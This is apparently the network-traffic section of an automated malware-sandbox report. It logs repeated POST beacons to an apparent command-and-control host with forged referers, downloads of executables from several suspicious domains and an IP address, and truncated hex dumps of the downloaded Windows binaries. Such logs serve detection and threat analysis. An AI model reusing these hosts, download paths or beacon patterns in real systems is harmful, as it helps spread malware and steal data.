                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 22:30:39 GMTContent-Type: application/octet-streamContent-Length: 34272Last-Modified: Thu, 13 Jan 2022 21:50:37 GMTConnection: keep-aliveETag: "61e09ead-85e0"Expires: Thu, 20 Jan 2022 22:30:39 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dc 34 e0 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 26 00 00 00 70 00 00 00 00 00 00 9e 45 00 00 00 20 00 00 00 c0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 00 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 45 00 00 57 00 00 00 00 60 00 00 b0 48 00 00 00 00 00 00 00 00 00 00 00 74 00 00 e0 11 00 00 00 c0 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 25 00 00 00 20 00 00 00 26 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b0 48 00 00 00 60 00 00 00 4a 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 00 00 00 02 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 45 00 00 00 00 00 00 48 00 00 00 02 00 05 00 60 26 00 00 cc 16 00 00 03 00 00 00 08 00 00 06 2c 3d 00 00 18 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc 9c 13 30 fe 2b ae 5a d6 7a ac f3 43 b7 f3 d0 4f 41 f6 2c d8 0f c4 35 18 75 73 0e e1 16 be ef a3 3f 19 94 62 e8 f0 e1 8a fb 85 b8 87 59 42 e8 ad d3 f8 5b fd 4f 1a cd d7 dd 18 89 b6 a0 77 bf ba bb 4f 04 9e 5e 6e 66 4f 15 a1 dc 89 0c ac bd 32 89 5f 0e 1d 62 f1 53 25 4b bc 84 cf 67 2a e9 83 c4 fc ca 09 3e 4a 4e 65 92 0c e8 ad 3d 43 ca 30 5a 56 2c 40 69 a2 00 22 02 28 01 00 00 0a 00 2a 00 00 00 13 30 02 00 33 00 00 00 01 00 00 11 00 2b 0f 2b 14 2b 15 2b 16 2b 1b 2b 20 2b 00 2b 1f 2a 28 16 00 00 0a 2b ea 0a 2b e9 06 2b e8 28 05 00 00 06 2b e3 6f 17 00 00 0a 2b de 0b 2b dd 07 2b de 00 1b 30 06 00 af 00 00 00 02 00 00 11 00 00 20 00 0c 00 00 2b 04 00 00 de 0c 28 4f 00 00 0a 2b f5 26 00 00 de 00 d0 46 00 00 01 2b 57 72 01 00 00 70 28 02 00 00 06 72 29 00 00 70 28 02 00 00 06 72 2d 00 00 70 28 02 00 00 06 2b 3e 17 8d 18 00 00 01 25 16 d0 19 00 00 01 2b 36 a2 2b 3a 2b 3f 17 8d 01 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 22:30:43 GMTContent-Type: application/octet-streamContent-Length: 535232Last-Modified: Thu, 13 Jan 2022 21:51:04 GMTConnection: keep-aliveETag: "61e09ec8-82ac0"Expires: Thu, 20 Jan 2022 22:30:43 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 73 0f cc 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 3a 00 00 00 0a 04 00 00 00 00 00 00 a0 04 00 00 20 00 00 00 60 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 be bf 08 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e4 01 00 00 00 90 00 00 ac 08 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 6c 73 00 00 00 00 00 70 00 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 43 52 54 00 00 00 00 00 10 00 00 00 80 00 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 ac 08 04 00 00 90 00 00 ac 08 04 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 80 01 00 00 a0 04 00 11 7d 01 00 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 22:30:52 GMTContent-Type: application/octet-streamContent-Length: 2387648Last-Modified: Thu, 13 Jan 2022 21:51:33 GMTConnection: keep-aliveETag: "61e09ee5-246ec0"Expires: Thu, 20 Jan 2022 22:30:52 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 ca 5e 3d 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 64 3f 00 00 18 03 00 00 00 00 00 00 e0 42 00 00 20 00 00 00 a0 3f 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 44 00 00 04 00 00 6f 94 24 00 02 00 60 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 3f 00 dc 01 00 00 00 c0 3f 00 14 17 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 65 64 61 74 61 00 00 00 a0 3f 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 43 52 54 00 00 00 00 00 10 00 00 00 b0 3f 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 14 17 03 00 00 c0 3f 00 14 17 03 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 43 52 54 00 00 00 00 00 80 01 00 00 e0 42 00 17 79 01 00 00 1e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qsmgbhufo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://asruhu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jcgov.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 139Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://obmpjgr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sstfqxq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jlldr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 199Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://voqqwvg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 247Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lmkns.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qhgexnr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yhmjbvbr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hyjsal.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 364Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dgxouben.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 112Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bculwb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 238Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qfpwti.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xvnibudur.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wmvxxhaln.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ogoctcljqs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ioktb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 171Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dukmi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 252Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mcwxjjc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ohvdekeqkm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mlhkcu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 216Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vevlc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ohlut.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 242Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://omhdbkt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mfconnslgq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 240Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pubhrhxb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ajgkqwkg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 364Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xrbspm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://epcciphsoh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 332Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tbqbqbxaj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yedkq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 344Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nekvodf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ywykfwn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 134Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qfbgcss.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 236Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lxjysfgjrh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 288Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qxnyvqdps.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 326Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wcdhabii.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ynptmns.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 149Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yjoyannoc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 161Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vsnokv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 219Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wlmasccc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qalbmnobc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 344Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qmvwr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fhfjy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://krgodthiqk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 295Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fpepckdf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 250Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/8474_1641976243_3082.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ovhmquitm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 346Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jbmqdifhe.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /9.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: a0621298.xsph.ru
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fkgaaiey.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 369Host: host-data-coin-11.com
